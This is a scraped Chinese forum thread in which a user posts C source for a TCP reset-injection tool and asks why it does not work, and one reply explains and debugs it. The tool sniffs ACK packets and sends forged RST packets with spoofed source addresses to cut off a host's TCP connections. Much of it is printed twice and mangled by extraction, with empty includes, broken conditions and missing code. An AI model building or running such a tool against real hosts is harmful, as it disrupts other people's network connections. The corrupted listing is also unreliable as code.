大家给看看下面这个攻击程序吧!
来源: 互联网 发布时间:2015-04-01
本文导语: 据说是若被攻击IP位于同网段,则断开它与外界的所有tcp连接若为远程主机,则断开它与本网段的所有tcp连接。本工具可以用来对付大白天搜proxy的机器,前提是泥知道哪台机器在搜,且该机器位于同网段, 可我用自己...
据说是:若被攻击IP位于同网段,则断开它与外界的所有TCP连接;若为远程主机,则断开它与本网段的所有TCP连接。本工具可以用来对付大白天搜proxy的机器,前提是你知道哪台机器在搜,且该机器位于同网段。可我用自己的两台机器互相攻了一下,好像没什么反应?大家给分析一下它到底在干吗吧?
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __FAVOR_BSD
#include
/* IP protocol number for TCP; main() writes it into the protocol field of the IP header it builds. */
#define IP_TCP 6
/* Size in bytes of the receive buffer (buf_recv) declared in main(). */
#define PACKET_SIZE 4096
/*
 * Scratch layout used only for computing the TCP checksum: address, protocol
 * and length fields followed by a copy of the TCP header. main() fills it and
 * hands it to checksum(); it is not the buffer passed to sendto().
 * main() sizes the fields ahead of tcpheader as 12 bytes
 * (`12 + sizeof(struct tcphdr)`).
 */
struct pseudohdr // pseudo tcp header
{
u_long saddr;    /* set by main() from the captured packet's destination address */
u_long daddr;    /* set by main() from the captured packet's source address */
u_char zero;     /* left at 0 by the bzero() in main() */
u_char protocol; /* main() stores 6 (TCP) here */
u_short length;  /* main() stores htons(sizeof(struct tcphdr)) here */
struct tcphdr tcpheader; /* copy of the TCP header being checksummed */
};
/*
 * Buffer for the datagram main() transmits: an IP header directly followed
 * by a TCP header. main() sets ihl = 5 and sends 40 bytes of this struct,
 * so no IP options and no payload are included.
 */
struct ip_packet
{
struct iphdr ipheader;   /* IP header, filled field by field in main() */
struct tcphdr tcpheader; /* TCP header, filled field by field in main() */
};
/*
 * Add up `data` as 16-bit words and return the bitwise complement of the
 * total. main() calls this over the TCP pseudo-header to obtain th_sum.
 *
 * NOTE(review): characters were lost from this listing when the page was
 * extracted. The loop condition and the odd-length branch below are not
 * valid C as shown, so the exact arithmetic cannot be confirmed from this
 * text.
 *
 * data   - buffer to sum, read as an array of u_short
 * length - buffer size; main() passes a byte count
 *          (12 + sizeof(struct tcphdr))
 *
 * Returns the complemented sum, truncated to u_short by the return type.
 */
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
/* Word loop; the comparison in the condition is incomplete in this listing. */
for (i = 0;i > 1);i ++)
value += data[i];
/* Odd byte count: one more element is added; the operator applied to it is missing here. */
if ((length & 1) == 1)
value += (data[i] 16);
return(~value);
}
/* Declared only; the definition of leave() is not part of this listing. */
void leave();
/*
 * Socket descriptors, -1 while not open. fd_send is the raw socket opened in
 * main(); fd_recv is not referenced in the visible text (presumably the
 * capture socket; confirm against the complete source).
 */
int fd_recv = -1, fd_send = -1;
/*
 * Interface request structures; not referenced in the visible text.
 * Presumably the current and saved interface flags; confirm.
 */
struct ifreq ifr, ifr_old;
/*
 * Entry point of a TCP reset-injection tool. For a captured TCP segment that
 * carries ACK, it builds one 40-byte IP+TCP datagram with the RST flag set,
 * with the captured segment's destination as its source address and the
 * captured segment's source as its destination, and transmits it through a
 * raw socket.
 *
 * NOTE(review): the page extraction dropped text from this function. The
 * statements starting "if (argc" and "if (k" are fragments; whatever sat
 * inside them (where `ip`, `tcp`, `ips` and the AGAIN label are set up) is
 * not visible here. Presumably that was argument handling and the capture
 * loop; confirm against a complete copy.
 *
 * Defensive notes, taken from the values visible below:
 *  - Every datagram built here has IP id 0x1234, TTL 0xff at the sender,
 *    total length 0x28, TCP window 2048 and only RST set. That fixed
 *    combination is usable as an IDS signature or a packet-capture filter.
 *  - Opening the raw socket requires root or CAP_NET_RAW on Linux, so
 *    restricting that capability limits who can run code of this kind.
 *  - TCP stacks that implement RFC 5961 accept a RST only when its sequence
 *    number is exactly the next expected one, and answer any other in-window
 *    RST with a challenge ACK.
 */
main(int argc,char *argv[])
{
char device[] = "eth0";       /* interface name; not used in the visible text */
u_char buf_recv[PACKET_SIZE]; /* receive buffer; not used in the visible text */
struct ip_packet buf_send;    /* the datagram that gets transmitted */
struct pseudohdr pseudoheader;/* checksum scratch area */
struct iphdr * ip;            /* IP header of the captured packet (assigned in missing text) */
struct tcphdr * tcp;          /* TCP header of the captured packet (assigned in missing text) */
struct in_addr in;
u_long ips;                   /* send address used for sendto() (assigned in missing text) */
int i, j, k;
int from_len, datalen;
struct sockaddr from; struct sockaddr_in to;
/* NOTE(review): truncated by extraction. The visible tail skips (goto AGAIN) any segment without the ACK flag. */
if (argc th_flags & TH_ACK ) == 0) goto AGAIN;
/* Report the captured segment: argv[1] and source port, then destination address and port. */
in.s_addr = ip->daddr;
printf("%s:%d to %s:%d listened, ", argv[1],
ntohs(tcp->th_sport), inet_ntoa(in),
ntohs(tcp->th_dport) );
/* Raw socket: the IP header is supplied by this program rather than by the kernel. */
if ( (fd_send = socket( AF_INET,
SOCK_RAW,IPPROTO_RAW)) == -1) {
perror("raw socket error");
exit(-1);
}
bzero((char *)&buf_send, sizeof(struct ip_packet));
/*FAKE TCP HEADER*/
/* Mirror of the captured segment: ports swapped, seq taken from its ack and ack from its seq. */
buf_send.tcpheader.th_sport = tcp->th_dport;
buf_send.tcpheader.th_dport = tcp->th_sport;
buf_send.tcpheader.th_seq = tcp->th_ack;
buf_send.tcpheader.th_ack = tcp->th_seq;
buf_send.tcpheader.th_x2 = 0;
buf_send.tcpheader.th_off = 0x50;
/* RST is the only flag set. */
buf_send.tcpheader.th_flags = TH_RST;
buf_send.tcpheader.th_win= htons(2048);
/* Checksum field must be zero while the checksum is being computed. */
buf_send.tcpheader.th_sum= 0;
buf_send.tcpheader.th_urp= 0;
/*FAKE IP HEADER*/
/* Constant id, TTL and length: the same values appear in every datagram this code emits. */
buf_send.ipheader.version = 4;
buf_send.ipheader.ihl = 5;
buf_send.ipheader.tos = 0;
buf_send.ipheader.tot_len = htons(0x28);
buf_send.ipheader.id = 0x1234;
buf_send.ipheader.frag_off = 0;
buf_send.ipheader.ttl = 0xff;
buf_send.ipheader.protocol = IP_TCP;
buf_send.ipheader.check = 0;
/* Source address is the captured packet's destination, i.e. not this host's own address. */
buf_send.ipheader.saddr = ip->daddr;
buf_send.ipheader.daddr = ip->saddr;
/*TCP CHECK SUM*/
/* Build the pseudo-header with the same address pair, copy the TCP header in, and checksum the whole area. */
bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
pseudoheader.saddr = ip->daddr;
pseudoheader.daddr = ip->saddr;
pseudoheader.protocol = 6;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy( (char *) &buf_send.tcpheader,
(char *) &pseudoheader.tcpheader,
sizeof(struct tcphdr) );
buf_send.tcpheader.th_sum = checksum(
(u_short *) &pseudoheader,
12+sizeof(struct tcphdr) );
/* Transmit 40 bytes (0x28, matching tot_len) to the address held in ips. */
to.sin_family = AF_INET;
to.sin_addr.s_addr = ips;
k = sendto( fd_send, (char *)& buf_send, 40, 0,
(struct sockaddr *)&to,
sizeof(struct sockaddr) );
/* NOTE(review): truncated by extraction; the visible tail closes the raw socket. */
if (k 0) close(fd_send);
printf("process terminamted.n");
exit(0);
}
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __FAVOR_BSD
#include
/* IP protocol number for TCP; main() writes it into the protocol field of the IP header it builds. */
#define IP_TCP 6
/* Size in bytes of the receive buffer (buf_recv) declared in main(). */
#define PACKET_SIZE 4096
/*
 * Scratch layout used only for computing the TCP checksum: address, protocol
 * and length fields followed by a copy of the TCP header. main() fills it and
 * hands it to checksum(); it is not the buffer passed to sendto().
 * main() sizes the fields ahead of tcpheader as 12 bytes
 * (`12 + sizeof(struct tcphdr)`).
 */
struct pseudohdr // pseudo tcp header
{
u_long saddr;    /* set by main() from the captured packet's destination address */
u_long daddr;    /* set by main() from the captured packet's source address */
u_char zero;     /* left at 0 by the bzero() in main() */
u_char protocol; /* main() stores 6 (TCP) here */
u_short length;  /* main() stores htons(sizeof(struct tcphdr)) here */
struct tcphdr tcpheader; /* copy of the TCP header being checksummed */
};
/*
 * Buffer for the datagram main() transmits: an IP header directly followed
 * by a TCP header. main() sets ihl = 5 and sends 40 bytes of this struct,
 * so no IP options and no payload are included.
 */
struct ip_packet
{
struct iphdr ipheader;   /* IP header, filled field by field in main() */
struct tcphdr tcpheader; /* TCP header, filled field by field in main() */
};
/*
 * Add up `data` as 16-bit words and return the bitwise complement of the
 * total. main() calls this over the TCP pseudo-header to obtain th_sum.
 *
 * NOTE(review): characters were lost from this listing when the page was
 * extracted. The loop condition and the odd-length branch below are not
 * valid C as shown, so the exact arithmetic cannot be confirmed from this
 * text.
 *
 * data   - buffer to sum, read as an array of u_short
 * length - buffer size; main() passes a byte count
 *          (12 + sizeof(struct tcphdr))
 *
 * Returns the complemented sum, truncated to u_short by the return type.
 */
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
/* Word loop; the comparison in the condition is incomplete in this listing. */
for (i = 0;i > 1);i ++)
value += data[i];
/* Odd byte count: one more element is added; the operator applied to it is missing here. */
if ((length & 1) == 1)
value += (data[i] 16);
return(~value);
}
/* Declared only; the definition of leave() is not part of this listing. */
void leave();
/*
 * Socket descriptors, -1 while not open. fd_send is the raw socket opened in
 * main(); fd_recv is not referenced in the visible text (presumably the
 * capture socket; confirm against the complete source).
 */
int fd_recv = -1, fd_send = -1;
/*
 * Interface request structures; not referenced in the visible text.
 * Presumably the current and saved interface flags; confirm.
 */
struct ifreq ifr, ifr_old;
/*
 * Entry point of a TCP reset-injection tool. For a captured TCP segment that
 * carries ACK, it builds one 40-byte IP+TCP datagram with the RST flag set,
 * with the captured segment's destination as its source address and the
 * captured segment's source as its destination, and transmits it through a
 * raw socket.
 *
 * NOTE(review): the page extraction dropped text from this function. The
 * statements starting "if (argc" and "if (k" are fragments; whatever sat
 * inside them (where `ip`, `tcp`, `ips` and the AGAIN label are set up) is
 * not visible here. Presumably that was argument handling and the capture
 * loop; confirm against a complete copy.
 *
 * Defensive notes, taken from the values visible below:
 *  - Every datagram built here has IP id 0x1234, TTL 0xff at the sender,
 *    total length 0x28, TCP window 2048 and only RST set. That fixed
 *    combination is usable as an IDS signature or a packet-capture filter.
 *  - Opening the raw socket requires root or CAP_NET_RAW on Linux, so
 *    restricting that capability limits who can run code of this kind.
 *  - TCP stacks that implement RFC 5961 accept a RST only when its sequence
 *    number is exactly the next expected one, and answer any other in-window
 *    RST with a challenge ACK.
 */
main(int argc,char *argv[])
{
char device[] = "eth0";       /* interface name; not used in the visible text */
u_char buf_recv[PACKET_SIZE]; /* receive buffer; not used in the visible text */
struct ip_packet buf_send;    /* the datagram that gets transmitted */
struct pseudohdr pseudoheader;/* checksum scratch area */
struct iphdr * ip;            /* IP header of the captured packet (assigned in missing text) */
struct tcphdr * tcp;          /* TCP header of the captured packet (assigned in missing text) */
struct in_addr in;
u_long ips;                   /* send address used for sendto() (assigned in missing text) */
int i, j, k;
int from_len, datalen;
struct sockaddr from; struct sockaddr_in to;
/* NOTE(review): truncated by extraction. The visible tail skips (goto AGAIN) any segment without the ACK flag. */
if (argc th_flags & TH_ACK ) == 0) goto AGAIN;
/* Report the captured segment: argv[1] and source port, then destination address and port. */
in.s_addr = ip->daddr;
printf("%s:%d to %s:%d listened, ", argv[1],
ntohs(tcp->th_sport), inet_ntoa(in),
ntohs(tcp->th_dport) );
/* Raw socket: the IP header is supplied by this program rather than by the kernel. */
if ( (fd_send = socket( AF_INET,
SOCK_RAW,IPPROTO_RAW)) == -1) {
perror("raw socket error");
exit(-1);
}
bzero((char *)&buf_send, sizeof(struct ip_packet));
/*FAKE TCP HEADER*/
/* Mirror of the captured segment: ports swapped, seq taken from its ack and ack from its seq. */
buf_send.tcpheader.th_sport = tcp->th_dport;
buf_send.tcpheader.th_dport = tcp->th_sport;
buf_send.tcpheader.th_seq = tcp->th_ack;
buf_send.tcpheader.th_ack = tcp->th_seq;
buf_send.tcpheader.th_x2 = 0;
buf_send.tcpheader.th_off = 0x50;
/* RST is the only flag set. */
buf_send.tcpheader.th_flags = TH_RST;
buf_send.tcpheader.th_win= htons(2048);
/* Checksum field must be zero while the checksum is being computed. */
buf_send.tcpheader.th_sum= 0;
buf_send.tcpheader.th_urp= 0;
/*FAKE IP HEADER*/
/* Constant id, TTL and length: the same values appear in every datagram this code emits. */
buf_send.ipheader.version = 4;
buf_send.ipheader.ihl = 5;
buf_send.ipheader.tos = 0;
buf_send.ipheader.tot_len = htons(0x28);
buf_send.ipheader.id = 0x1234;
buf_send.ipheader.frag_off = 0;
buf_send.ipheader.ttl = 0xff;
buf_send.ipheader.protocol = IP_TCP;
buf_send.ipheader.check = 0;
/* Source address is the captured packet's destination, i.e. not this host's own address. */
buf_send.ipheader.saddr = ip->daddr;
buf_send.ipheader.daddr = ip->saddr;
/*TCP CHECK SUM*/
/* Build the pseudo-header with the same address pair, copy the TCP header in, and checksum the whole area. */
bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
pseudoheader.saddr = ip->daddr;
pseudoheader.daddr = ip->saddr;
pseudoheader.protocol = 6;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy( (char *) &buf_send.tcpheader,
(char *) &pseudoheader.tcpheader,
sizeof(struct tcphdr) );
buf_send.tcpheader.th_sum = checksum(
(u_short *) &pseudoheader,
12+sizeof(struct tcphdr) );
/* Transmit 40 bytes (0x28, matching tot_len) to the address held in ips. */
to.sin_family = AF_INET;
to.sin_addr.s_addr = ips;
k = sendto( fd_send, (char *)& buf_send, 40, 0,
(struct sockaddr *)&to,
sizeof(struct sockaddr) );
/* NOTE(review): truncated by extraction; the visible tail closes the raw socket. */
if (k 0) close(fd_send);
printf("process terminamted.n");
exit(0);
}
搂主在做这方面的研究么?少见少见阿
大体上看了一下这段程序。
这个程序用命令行参数作为攻击对象,首先将自己的网卡设置成混杂模式,然后开始监听攻击对象的数据包,如果监听到的数据包满足:是IP包,而且是TCP的ACK包时,就发送一个RST包来重置连接,来达到断开连接的目的。如果程序退出,就让网卡退出混杂模式
如果你想找错的话,可以在你的机器上和目标机器上用tcpdump来抓一下包,看看你的伪造包到底发没发给目的主机;如果是收到了,可能是包的结构不对。
由于我也是初学,所以也就理解了这么多。
TCP/IP协议也是我以后的方向,希望能够多多交流。
我的QQ:49462335
大体上看了一下这段程序。
这个程序用命令行参数作为攻击对象,首先将自己的网卡设置成混杂模式,然后开始监听攻击对象的数据包,如果监听到的数据包满足:是IP包,而且是TCP的ACK包时,就发送一个RST包来重置连接,来达到断开连接的目的。如果程序退出,就让网卡退出混杂模式
如果你想找错的话,可以在你的机器上和目标机器上用tcpdump来抓一下包,看看你的伪造包到底发没发给目的主机;如果是收到了,可能是包的结构不对。
由于我也是初学,所以也就理解了这么多。
TCP/IP协议也是我以后的方向,希望能够多多交流。
我的QQ:49462335